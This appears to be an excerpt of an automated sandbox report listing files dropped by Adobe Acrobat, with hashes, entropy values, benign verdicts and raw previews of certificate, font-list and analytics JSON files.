                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                        Category:dropped
                        Size (bytes):71954
                        Entropy (8bit):7.996617769952133
                        Encrypted:true
                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                        Malicious:false
                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):192
                        Entropy (8bit):2.7464849065063075
                        Encrypted:false
                        SSDEEP:3:kkFkl2AM1fllXlE/HT8k0ZNNX8RolJuRdxLlGB9lQRYwpDdt:kKvA9T89NMa8RdWBwRd
                        MD5:F73672362AA0DADD947AFB2459BB1E78
                        SHA1:826261CE9F7170D3229DA6A6D1FF787AA6E01D66
                        SHA-256:9DC512B259F881B9A54B436778AFDA5520E3C8191BF63DF5067484CF7C2FDC9A
                        SHA-512:0C7D9FB693B01F882C1E62E6DB6917A5645A95D3A81C2C0A1F99AD1595B6362E59EB319E0EFDABB7A62394AB2281CFEC36CD78E4036B6AEDE8710391DFA56C9A
                        Malicious:false
                        Preview:p...... ........Ed..Yf..(....................................................... ..........W....+...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        File Type:data
                        Category:modified
                        Size (bytes):328
                        Entropy (8bit):3.242990426783058
                        Encrypted:false
                        SSDEEP:6:kKJ9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:ADImsLNkPlE99SNxAhUe/3
                        MD5:D2DB49AD11CC5187C0981F36915F560F
                        SHA1:DBE192CDF4A83A138627B46DD6754E5C1E0C6269
                        SHA-256:ADE93F7F1AED041A284876C3F0AE8ACD8FC1B107DCA1DF50D70DA73B9E2A4707
                        SHA-512:396FFD8FB23D7D048A719A8797B707779D5419B2EE7B1629DD2C4EDF23343840AEF1A0D1EB1421ED4251ED349AAA83B21B2E78511E637E0247451315731AC2E0
                        Malicious:false
                        Preview:p...... .........p%.Yf..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:PostScript document text
                        Category:dropped
                        Size (bytes):1233
                        Entropy (8bit):5.233980037532449
                        Encrypted:false
                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                        Malicious:false
                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:PostScript document text
                        Category:dropped
                        Size (bytes):1233
                        Entropy (8bit):5.233980037532449
                        Encrypted:false
                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                        Malicious:false
                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:PostScript document text
                        Category:dropped
                        Size (bytes):1233
                        Entropy (8bit):5.233980037532449
                        Encrypted:false
                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                        Malicious:false
                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:PostScript document text
                        Category:dropped
                        Size (bytes):10880
                        Entropy (8bit):5.214360287289079
                        Encrypted:false
                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                        MD5:B60EE534029885BD6DECA42D1263BDC0
                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                        Malicious:false
                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:PostScript document text
                        Category:dropped
                        Size (bytes):10880
                        Entropy (8bit):5.214360287289079
                        Encrypted:false
                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                        MD5:B60EE534029885BD6DECA42D1263BDC0
                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                        Malicious:false
                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):295
                        Entropy (8bit):5.344712221457632
                        Encrypted:false
                        SSDEEP:6:YEQXJ2HXFUPRSUGDcCpvB3/dVlPIHAR0YvjeoAvJM3g98kUwPeUkwRe9:YvXKXFJaCpvR/ZwHAfVGMbLUkee9
                        MD5:AD77DD0515204EB3EBEA3A0F99BF5803
                        SHA1:C2A96E0617265BFB4EB3327BBF1CBA4C26AC0CF4
                        SHA-256:86928E4160FA7E6F6020D655CEDBF4B1FB6E44762DD25615ACD9EC139D468C8F
                        SHA-512:F2646EB09586C8CB1EDADF3395BE8EEACEBC5B917662BC07E0FBED50E52DDD59D21C31A1236F352619EC1BEDCC663330F03472975BE6870A22B4D9FB8A86AF72
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):294
                        Entropy (8bit):5.2770031560143495
                        Encrypted:false
                        SSDEEP:6:YEQXJ2HXFUPRSUGDcCpvB3/dVlPIHAR0YvjeoAvJfBoTfXpnrPeUkwRe9:YvXKXFJaCpvR/ZwHAfVGWTfXcUkee9
                        MD5:531C718815D367430428F088C131BEFB
                        SHA1:E5A249EC5DF3951DC61C078B7062D8877A65C030
                        SHA-256:5E2701C6DC63D6447B2DF3AFA7EA5C4DC9EC3D8E5A39090562C8E97EE7FDF72F
                        SHA-512:4B5F095E18C2065F1D228228816A2B6467EFFE5BE51743534819B90117E932E2A0627F3ADE66ADC3EDCE1B9A59D1A0E0461B18577C36AE75783ACF280051A6A0
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):294
                        Entropy (8bit):5.255414829279211
                        Encrypted:false
                        SSDEEP:6:YEQXJ2HXFUPRSUGDcCpvB3/dVlPIHAR0YvjeoAvJfBD2G6UpnrPeUkwRe9:YvXKXFJaCpvR/ZwHAfVGR22cUkee9
                        MD5:9231D4ADB335176B480C427BE3DDD604
                        SHA1:4519EC7B47B4BEB5D9B0C0FC9F81D9B0BEC4520E
                        SHA-256:73B3534CAF46454975A44D4ED82AF623DED2DBF54793C58284FEA3F4EC78CE47
                        SHA-512:612D83F95B0D68E17B4596B677BCAB4329728A5AC4A38915E7E4FEAB535FF7DF1419A52C30939138D8196CA63706B08FCC906BDFF274769B271E4343B297AB9F
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):285
                        Entropy (8bit):5.32100634116575
                        Encrypted:false
                        SSDEEP:6:YEQXJ2HXFUPRSUGDcCpvB3/dVlPIHAR0YvjeoAvJfPmwrPeUkwRe9:YvXKXFJaCpvR/ZwHAfVGH56Ukee9
                        MD5:CFE6FD95E3B82E4C8C41B525FFD26C04
                        SHA1:3D59C2225F7B25FA6B4094B543D3AA888D65F2EF
                        SHA-256:BDFE751F7381786E7BE6B6B8295B3916047D8048D3DDC4E203A49E0C8119817B
                        SHA-512:B2CB43DE8DB24E716DE7B36FC013741CA3C233F698A80622187427F5B37F973743B12636294108156E714DBAAF4E5A7806EDF728B5E1CE8AAC3F3322AE2D78E1
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):1123
                        Entropy (8bit):5.690725098928895
                        Encrypted:false
                        SSDEEP:24:Yv6XnJhL6pLgE9cQx8LennAvzBvkn0RCmK8czOCCSQ:YvKJhmhgy6SAFv5Ah8cv/Q
                        MD5:80ACCB3B47399F0FD15B82F7E5EE8A51
                        SHA1:9F70F0F4B1A7F363ECA181C6708E8F9160F048E6
                        SHA-256:588976A5D84CF1D26708F1D31323A5CFCDC639A5EBFFD47E0E24CE4D6D0038F2
                        SHA-512:093749E834B0FC57144984C054F8CFFD827A48BC5C8965F2D0A276E9B4337BF958D08A3E8535D4B19A021A12991412F982DDB8A0DDED59C4BB1ACD9317E554E2
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):289
                        Entropy (8bit):5.268478796807626
                        Encrypted:false
                        SSDEEP:6:YEQXJ2HXFUPRSUGDcCpvB3/dVlPIHAR0YvjeoAvJf8dPeUkwRe9:YvXKXFJaCpvR/ZwHAfVGU8Ukee9
                        MD5:13C23B0F3E4FAFAEA29367DE6114CC68
                        SHA1:68CAD44DA2A66A17A4315B74DEBE9BB79784169F
                        SHA-256:45BDAFABC815047B80A46F9DE98BE539EAFEAB463D0AAD9E9BE21E407B4B7F95
                        SHA-512:5F8C7469FD357665EA058C91F4E4B93BDECC8AE37074772B0EEAFDB471DC52EC321273D345724D51BFB92857CCB5AB2B85D8AC2B242B3946D059C5914DE6304A
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):292
                        Entropy (8bit):5.266916186303124
                        Encrypted:false
                        SSDEEP:6:YEQXJ2HXFUPRSUGDcCpvB3/dVlPIHAR0YvjeoAvJfQ1rPeUkwRe9:YvXKXFJaCpvR/ZwHAfVGY16Ukee9
                        MD5:F3FCED2A509BB0939E064B0AB9101632
                        SHA1:2F460346E94AA9166D0319EA0A564416D27DA2A3
                        SHA-256:357833B047B5134ED76610C8F21075071ACD923F4D551088D335BAC552A5B44A
                        SHA-512:A6E3768D671A976442AF0B82A9F7F80E99F35165BB80A56D73657A265AC8AD1E40733F8631EB72DF3FCD780AAF6A2C743C053F7285456A804B83FB24AFEB1D1F
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):289
                        Entropy (8bit):5.284405990507622
                        Encrypted:false
                        SSDEEP:6:YEQXJ2HXFUPRSUGDcCpvB3/dVlPIHAR0YvjeoAvJfFldPeUkwRe9:YvXKXFJaCpvR/ZwHAfVGz8Ukee9
                        MD5:558809647852E6CC1705ED056D5715DB
                        SHA1:6C3724294213B2DFB291F201D81504BEA6FDFACE
                        SHA-256:9123CF6E78355F86F66D7245C72969E397CCDCC3DCC69D0A0DF24367B4C003D0
                        SHA-512:17E9D0A3A148982D4B7537DA3E0B61B30E6100ECD3E3EF954012EF4BB04245A12A2FCF708BB16D9CF8EFE7C19214C303E81C52D0BB5CD892CD96EBA8FFB28465
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):295
                        Entropy (8bit):5.29731292962101
                        Encrypted:false
                        SSDEEP:6:YEQXJ2HXFUPRSUGDcCpvB3/dVlPIHAR0YvjeoAvJfzdPeUkwRe9:YvXKXFJaCpvR/ZwHAfVGb8Ukee9
                        MD5:72C37D08C443D3D43B6A57AD38F80209
                        SHA1:83F51B3AD37E03C3DD12D5472044FEFD2A09C183
                        SHA-256:9BF3E65B14ED6D9DE8563D60189393BE4861459A8D2B57FBC5C12F606A6CCF86
                        SHA-512:AE55F6FFC87C83CF5EC6EAAEBD3185E7B14E70CC6D838B63812DD282532E7C2778DD81270C3C49A40143E0A394425AB05D0F1A53A03B00595674E7CD7D407BEB
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):289
                        Entropy (8bit):5.27749887257537
                        Encrypted:false
                        SSDEEP:6:YEQXJ2HXFUPRSUGDcCpvB3/dVlPIHAR0YvjeoAvJfYdPeUkwRe9:YvXKXFJaCpvR/ZwHAfVGg8Ukee9
                        MD5:64FB430DC926190EB11D30F5448D8EA5
                        SHA1:0CFB16685DAAEBEE1FACF3D75C6F8DEB29F37EE2
                        SHA-256:3E957C7F2DD603A261952B847CB0056BEF71D2091FDE406F88645D36A759B553
                        SHA-512:51D7113143850D7CBA80E8B6C32CCC2E7D892F7F4B949E72A5BA348BB148AEC7A7AB77E61695FE9D2FE19F179F8602FC5E5C2399495CA41CF922EB188AAE24FB
                        Malicious:false
                        Preview:{"analyticsData":{"responseGUID":"26d5261a-feae-4b7f-947c-7cebc4f4b9b8","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1737015865178,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        File Type:JSON data
                        Category:dropped
                        Size (bytes):284
                        Entropy (8bit):5.263734452409116
                        Encrypted:false
                        SSDEEP:6:YEQXJ2HXFUPRSUGDcCpvB3/dVlPIHAR0YvjeoAvJf+dPeUkwRe9:YvXKXFJaCpvR/ZwHAfVG28Ukee9
                        MD5:AF5F109FB0157961AA5432553EE1E565
                        SHA1:9ECDF351144631C1B8ADE19B4633CD3671552266
                        SHA-256:02767164EB3E516C937C33D7576ACED4115F0F8A385469143727907CFBE0A8C8
                        SHA-512:8965342BA9E4D92C4ACD9BB9ED8C3B5E5097C73B94BA719397ADA8F73E61596F549C1E4E10CD425AF1653890807B4ACD5DC8CDDA2B9EAED4F0B414021B55005F
                        Malicious:false
